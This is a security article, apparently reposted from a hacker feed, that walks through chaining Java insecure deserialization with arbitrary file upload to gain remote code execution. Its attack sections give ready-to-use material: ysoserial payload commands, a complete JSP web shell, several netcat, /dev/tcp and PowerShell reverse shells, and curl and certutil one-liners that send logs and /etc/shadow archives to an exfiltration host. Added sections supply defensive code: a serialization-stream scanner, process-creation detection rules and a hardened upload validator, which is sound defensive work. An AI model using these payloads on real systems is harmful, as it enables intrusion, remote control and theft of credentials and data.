
Introduction:
In the complex landscape of web application security, vulnerabilities rarely exist in isolation. The true danger emerges when attackers chain multiple, seemingly lower-severity flaws to create a devastating attack path. This article deconstructs a critical P2 finding where an attacker combined Insecure Deserialization and Arbitrary File Upload to achieve unauthenticated Remote Code Execution (RCE) and full SYSTEM-level compromise on a Java-based service.
Learning Objectives:
- Understand the mechanics of Java object deserialization attacks and how to exploit them.
- Learn how to weaponize an arbitrary file upload vulnerability beyond simple defacement.
- Master the commands and techniques to detect, exploit, and mitigate this potent vulnerability chain.
You Should Know:
1. Identifying Java Deserialization Endpoints
The first step is locating endpoints that accept serialized Java objects. These often have distinctive characteristics in HTTP requests.
Example HTTP Request with Serialized Data (Often Base64 Encoded)
POST /api/v1/process HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/x-java-serialized-object

rO0ABXQAVklF... (abbreviated Base64 serialized object data)
Step-by-step guide: Intercept application traffic using a proxy like Burp Suite. Look for POST requests whose body or specific cookies (e.g., JSESSIONID) contain long, base64-like strings. The Content-Type header can also be a clue, but it is often misconfigured. Tools like `ysoserial` can then generate payloads to test these endpoints.
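The same characteristics work from the defender's side. A Java serialization stream always begins with the magic bytes AC ED 00 05, so its base64 form always begins with "rO0AB" (the "rO0ABXQA..." in the request above). The following Python scanner, added here as an example and not code from the original post, checks request bodies and cookie values for either form and lists the class names the stream declares, so a reviewer can tell a harmless HashMap from a stream built around the commons-collections gadget library. The sample request, the `java_stream` helper that fabricates a minimal stream, and the package-prefix watchlist are all constructed for the example.

```python
"""Spotting Java serialization streams in inbound requests (added example).

A Java serialization stream always starts with the magic bytes AC ED 00 05,
so its base64 form always starts with "rO0AB". This scanner checks request
bodies and cookie values for either form and lists the class names the
stream declares, so a reviewer can tell a harmless HashMap from a stream
built around a gadget library.
"""
import base64
import binascii
import re
from typing import Optional

JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
JAVA_SERIAL_B64_PREFIX = b"rO0AB"
TC_OBJECT = 0x73       # stream tag: new object
TC_CLASSDESC = 0x72    # stream tag: class descriptor (followed by a UTF string)
_CLASS_NAME = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)+$")

# Package prefix of the CommonsCollections gadget chains the article names;
# any class declared under it deserves a closer look (watchlist is an example).
SUSPICIOUS_PREFIXES = ("org.apache.commons.collections",)


def decode_candidate(value: bytes) -> Optional[bytes]:
    """Return the raw serialization stream carried by value, or None."""
    value = value.strip()
    if value.startswith(JAVA_SERIAL_MAGIC):
        return value
    if value.startswith(JAVA_SERIAL_B64_PREFIX):
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            return None
        if raw.startswith(JAVA_SERIAL_MAGIC):
            return raw
    return None


def declared_classes(stream: bytes) -> list:
    """Recover class names from TC_CLASSDESC records by shape.

    A descriptor is the tag 0x72, a 2-byte big-endian length and the
    class name. Matching that shape is enough for triage; this is not a
    full parser of the stream grammar.
    """
    names = []
    i = 0
    while i < len(stream) - 3:
        if stream[i] == TC_CLASSDESC:
            length = int.from_bytes(stream[i + 1:i + 3], "big")
            candidate = stream[i + 3:i + 3 + length]
            if 0 < length <= 256 and len(candidate) == length and _CLASS_NAME.match(candidate):
                names.append(candidate.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def inspect_request(body: bytes, cookies: dict) -> list:
    """Return one finding per location (body or cookie) that carries a stream."""
    findings = []
    locations = [("body", body)] + [("cookie:" + k, v.encode()) for k, v in cookies.items()]
    for where, value in locations:
        stream = decode_candidate(value)
        if stream is None:
            continue
        classes = declared_classes(stream)
        findings.append({
            "location": where,
            "classes": classes,
            "suspicious": [c for c in classes if c.startswith(SUSPICIOUS_PREFIXES)],
        })
    return findings


def java_stream(class_name: str) -> bytes:
    """Constructed test input: a minimal stream declaring one class.

    Header, TC_OBJECT, TC_CLASSDESC, name, 8-byte serialVersionUID, flags,
    zero fields, TC_ENDBLOCKDATA, TC_NULL superclass. Not a real object graph.
    """
    name = class_name.encode("ascii")
    return (JAVA_SERIAL_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC])
            + len(name).to_bytes(2, "big") + name
            + b"\x00" * 8 + b"\x03\x00\x00\x78\x70")


# Constructed sample request: a harmless HashMap in the body, and a stream
# from the commons-collections package smuggled into a cookie, both base64.
SAMPLE_BODY = base64.b64encode(java_stream("java.util.HashMap"))
SAMPLE_COOKIES = {
    "JSESSIONID": "0A1B2C3D4E5F",
    "prefs": base64.b64encode(java_stream("org.apache.commons.collections4.map.LazyMap")).decode(),
}

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_BODY, SAMPLE_COOKIES):
        print(finding)
```

In a WAF or reverse-proxy hook the same two checks (magic bytes, then declared class names) are cheap enough to run on every request; the class list is what turns a generic "serialized object seen" alert into something an analyst can act on.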
2. Crafting the Deserialization Payload with ysoserial
Once a vulnerable endpoint is found, you use a tool like `ysoserial` to generate a malicious serialized object that executes OS commands.
Generating a payload that runs a calc.exe (Proof-of-Concept)
java -jar ysoserial.jar CommonsCollections4 'calc.exe' > payload.ser
For a reverse shell, the command must be encoded appropriately
java -jar ysoserial.jar CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84MCAwPiYx}|{base64,-d}|{bash,-i}' > shell.ser
Step-by-step guide: Ysoserial uses “gadget chains” (e.g., CommonsCollections4) from libraries within the target application. You must identify the correct chain for the target’s classpath. The output is a binary file (payload.ser) which you then base64-encode and submit in the vulnerable HTTP parameter.
3. Weaponizing Arbitrary File Upload
An arbitrary file upload flaw allows the attacker to place a malicious JSP web shell on the server, but they need to know the upload path. The deserialization payload can be used to reveal this.
Linux command to find web root directories, injected via deserialization
find / -name "*.jsp" -type f 2>/dev/null | head -n 5
Windows command alternative
dir /s C:\*.jsp | findstr /i "webapps wwwroot"
Step-by-step guide: Exploit the deserialization vulnerability to execute a system command that discovers the absolute path where uploaded files are stored. This turns the file upload from a blind vulnerability into a known location for deploying a web shell.
4. Deploying a Web Shell via Upload
With the upload path known, use the file upload functionality to deploy a JSP web shell.
Example JSP Web Shell (cmd.jsp)
<%@ page import="java.util.*,java.io.*"%>
<%
    // Whatever arrives in ?cmd= is handed straight to the OS: no validation, no authentication.
    if (request.getParameter("cmd") != null) {
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>
Step-by-step guide: This code is saved as a `.jsp` file and uploaded through the vulnerable functionality. Once uploaded, you can access it at `http://vulnerable-app.com/uploads/cmd.jsp?cmd=whoami` to execute commands directly.
5. Establishing a Reverse Shell
A simple web shell is limited. Use it to execute a more powerful reverse shell payload for interactive access.
Using the web shell to fetch and execute a netcat reverse shell
cmd=/usr/bin/nc -e /bin/bash 192.168.1.2 4444
For a more robust Linux reverse shell
cmd=bash -c 'bash -i >& /dev/tcp/192.168.1.2/4444 0>&1'
Windows reverse shell using PowerShell
cmd=powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Step-by-step guide: Before executing these commands, start a netcat listener on your attack machine: `nc -nlvp 4444`. Then, trigger the reverse shell by passing the appropriate command to your deployed web shell via the `cmd` parameter.
6. Privilege Escalation to SYSTEM/NT AUTHORITY
The initial shell often runs under a limited service account. The final step is escalating privileges to gain full control over the host.
On Windows, check for common privilege escalation vectors
whoami /priv
systeminfo
accesschk.exe /accepteula -u -s
On Linux, check sudo permissions and SUID binaries
sudo -l
find / -perm -4000 -type f 2>/dev/null
Step-by-step guide: These commands help identify misconfigurations. For example, a service running as SYSTEM might have weak folder permissions, allowing you to replace its DLLs. Or a `sudo` rule might allow the service account to run a specific command as root without a password.
7. Exfiltration and Debug Log Harvesting
With SYSTEM-level access, you can now exfiltrate sensitive data, including application debug logs that may contain secrets for other systems.
On Windows, using built-in certutil to exfiltrate a file
certutil -encode loot.zip encoded.txt & findstr /V "CERTIFICATE" encoded.txt > stager.txt & powershell Invoke-WebRequest -Uri http://exfil-server.com/collect -Method Post -InFile stager.txt
On Linux, using curl to exfiltrate data
curl -X POST --data-binary @/var/app/logs/debug.log http://exfil-server.com/collect
tar -czf loot.tar.gz /etc/passwd /etc/shadow /app/config && curl -X POST --data-binary @loot.tar.gz http://exfil-server.com
Step-by-step guide: These commands package and exfiltrate data to a server controlled by the attacker. The Windows example uses `certutil` to base64 encode a file before sending it to avoid binary data corruption in a POST request.
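Every step in sections 5 to 7 leaves a process-creation record on the host, and that is where a defender catches this chain even when the web tier is blind. The Python rule set below is an added example, not part of the original post or any product: the log records are constructed in a simplified EDR/auditd-like shape (parent image, child image, command line) rather than real telemetry, and the rule names are invented. One structural rule flags a Java service spawning a shell (what the web shell's `Runtime.exec` looks like from the host); the pattern rules cover the reverse-shell, enumeration and exfiltration command lines shown in the article.

```python
"""Process-creation checks for the activity in sections 5 to 7 (added example).

The records below are constructed in a simplified EDR/auditd-like shape
(parent image, child image, command line); they are not real telemetry.
Two kinds of rule: a structural one (a Java service spawning a shell,
which is what the web shell's Runtime.exec call looks like from the host)
and command-line patterns for the reverse-shell, enumeration and
exfiltration commands the article shows.
"""
import re

SHELLS = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}
JAVA_IMAGES = {"java", "java.exe", "tomcat", "catalina.sh"}

# (rule name, pattern searched against the command line); names are invented.
RULES = [
    ("reverse_shell_netcat", re.compile(r"\bnc(?:at)?\b.*\s-e\s")),
    ("reverse_shell_devtcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("reverse_shell_powershell", re.compile(r"TCPClient\(.*GetStream\(\)", re.I)),
    ("suid_enumeration", re.compile(r"\bfind\s+/\s.*-perm\s+-4000\b")),
    ("sudo_enumeration", re.compile(r"\bsudo\s+-l\b")),
    ("exfil_certutil", re.compile(r"\bcertutil(?:\.exe)?\s+-encode\b", re.I)),
    ("exfil_curl_post", re.compile(r"\bcurl\b.*(?:-X\s*POST\b|--data-binary\s+@)")),
    ("credential_archive", re.compile(r"\btar\s.*-c\w*\s.*\s/etc/shadow\b")),
]


def evaluate(record: dict) -> list:
    """Return the names of every rule the record trips, structural rule first."""
    hits = []
    if record["parent"] in JAVA_IMAGES and record["image"] in SHELLS:
        hits.append("java_spawned_shell")
    for name, pattern in RULES:
        if pattern.search(record["cmdline"]):
            hits.append(name)
    return hits


def scan(records: list) -> dict:
    """Map record index -> rule hits, only for records that tripped a rule."""
    result = {}
    for i, rec in enumerate(records):
        hits = evaluate(rec)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry mirroring the article's commands, plus two
# benign records that must not fire.
SAMPLE_RECORDS = [
    {"parent": "java", "image": "sh", "cmdline": "sh -c whoami"},
    {"parent": "java", "image": "bash",
     "cmdline": "bash -c 'bash -i >& /dev/tcp/192.168.1.2/4444 0>&1'"},
    {"parent": "java.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();...\""},
    {"parent": "bash", "image": "find", "cmdline": "find / -perm -4000 -type f 2>/dev/null"},
    {"parent": "cmd.exe", "image": "certutil.exe", "cmdline": "certutil -encode loot.zip encoded.txt"},
    {"parent": "bash", "image": "curl",
     "cmdline": "curl -X POST --data-binary @/var/app/logs/debug.log http://exfil-server.com/collect"},
    {"parent": "systemd", "image": "java", "cmdline": "java -jar app.jar"},
    {"parent": "bash", "image": "curl", "cmdline": "curl -s https://updates.example.com/status"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_RECORDS).items():
        print(index, SAMPLE_RECORDS[index]["cmdline"][:60], "->", hits)
```

The structural rule is the one worth tuning first: a servlet container's service account has very few legitimate reasons to launch `sh`, `bash` or `powershell.exe`, so that single parent/child relationship catches the web shell before any reverse shell or exfiltration command is even typed.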
What Undercode Says:
- The Sum is Greater Than The Parts: Alone, a blind file upload or a deserialization bug might be rated lower. Chained together, they form a critical, system-compromising threat. Penetration tests must actively search for these chains.
- Context is King for Payloads: The success of `ysoserial` is entirely dependent on the libraries (gadget chains) present on the target server. Reconnaissance and careful testing are required; a payload that works on one endpoint may not work on another.
This vulnerability chain is a classic example of a “deathstar” attack path. The mitigation is twofold: first, implement robust input validation that rejects any serialized objects from untrusted sources; use safe serialization formats like JSON instead. Second, enforce strict controls on file uploads, including validating file type by content (not just extension), storing them outside the web root, or serving them via a separate domain with no script execution privileges.
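The upload half of that mitigation is concrete enough to show in code. The Python handler below is an added example, not the original post's code or any framework's API: it decides the file type by content (magic bytes) rather than by the client-supplied name or Content-Type, requires the declared extension to agree with the sniffed type, and stores the file under a server-generated random name in a directory the caller supplies, which should sit outside the web root. The allow-list of types, the size limit and the sample inputs (a fake PNG, the article's `cmd.jsp` under several names) are constructed for the example; the deserialization half of the mitigation is simply the application refusing serialized-object content types, which needs no code here.

```python
"""Hardened upload handling (added example, not the page's code).

Decides by content, not by the client-supplied name or Content-Type,
which file type was uploaded; stores the file under a server-generated
name, in a directory outside the web root, with the extension the sniffed
type dictates. An uploaded cmd.jsp therefore never lands anywhere the
servlet container would execute it, under any name.
"""
import secrets
import tempfile
from pathlib import Path

# Allow-listed types: stored extension -> magic bytes the content must start with.
MAGIC_BY_TYPE = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}
ALIASES = {"jpeg": "jpg"}
MAX_BYTES = 5 * 1024 * 1024  # example limit


class UploadRejected(ValueError):
    """Raised for anything the allow-list does not positively accept."""


def declared_type(filename: str) -> str:
    """Extension the client claims; only the final one counts, so
    'shell.png.jsp' declares 'jsp' and 'img.jsp.png' declares 'png'."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in name:
        raise UploadRejected("no extension")
    ext = name.rsplit(".", 1)[1].lower()
    ext = ALIASES.get(ext, ext)
    if ext not in MAGIC_BY_TYPE:
        raise UploadRejected("type not allowed: " + ext)
    return ext


def sniffed_type(content: bytes) -> str:
    """Type the bytes actually are, by magic number, or rejection."""
    for ext, magics in MAGIC_BY_TYPE.items():
        if content.startswith(magics):
            return ext
    raise UploadRejected("content does not match any allowed type")


def validate_upload(filename: str, content: bytes) -> str:
    """Return the accepted type, or raise UploadRejected."""
    if not content or len(content) > MAX_BYTES:
        raise UploadRejected("empty or oversized")
    declared = declared_type(filename)
    real = sniffed_type(content)
    if real != declared:
        raise UploadRejected("declared %s but content is %s" % (declared, real))
    return real


def is_accepted(filename: str, content: bytes) -> bool:
    try:
        validate_upload(filename, content)
        return True
    except UploadRejected:
        return False


def storage_name(ext: str) -> str:
    """Server-chosen name: 32 hex chars plus the sniffed extension; nothing
    from the client survives, so path traversal is not even a question."""
    return secrets.token_hex(16) + "." + ext


def store_upload(upload_root: Path, filename: str, content: bytes) -> Path:
    """Validate, then write under upload_root (which must lie outside the web root)."""
    dest = upload_root / storage_name(validate_upload(filename, content))
    dest.write_bytes(content)
    return dest


# Constructed sample inputs: a minimal PNG header and the article's web shell.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JSP_SHELL = b'<%@ page import="java.util.*,java.io.*"%>\n<% %>'

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print("stored as", store_upload(Path(tmp), "photo.PNG", FAKE_PNG).name)
    for name in ("cmd.jsp", "shell.png", "img.jsp.png"):
        print(name, "accepted" if is_accepted(name, JSP_SHELL) else "rejected")
```

The order of checks matters: the extension allow-list runs first because it is cheap and rejects `cmd.jsp` outright, but the content check is what stops `shell.png` carrying JSP source, and the server-generated name is what makes the stored path unguessable even if an attacker learns the upload directory through the deserialization step described in section 3.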
Prediction:
The sophistication of vulnerability chaining will only increase with the adoption of AI-powered penetration testing tools. These systems will be able to automatically map application attack surfaces, identify discrete vulnerabilities, and proactively chain them together to demonstrate real-world impact with minimal human intervention. This will force a shift in bug bounty programs and risk assessments from scoring individual CVEs to rating the overall attack resilience of an application’s architecture, making defense-in-depth not just a best practice but an absolute necessity.
Reported By: Hs Ninja – Hackers Feeds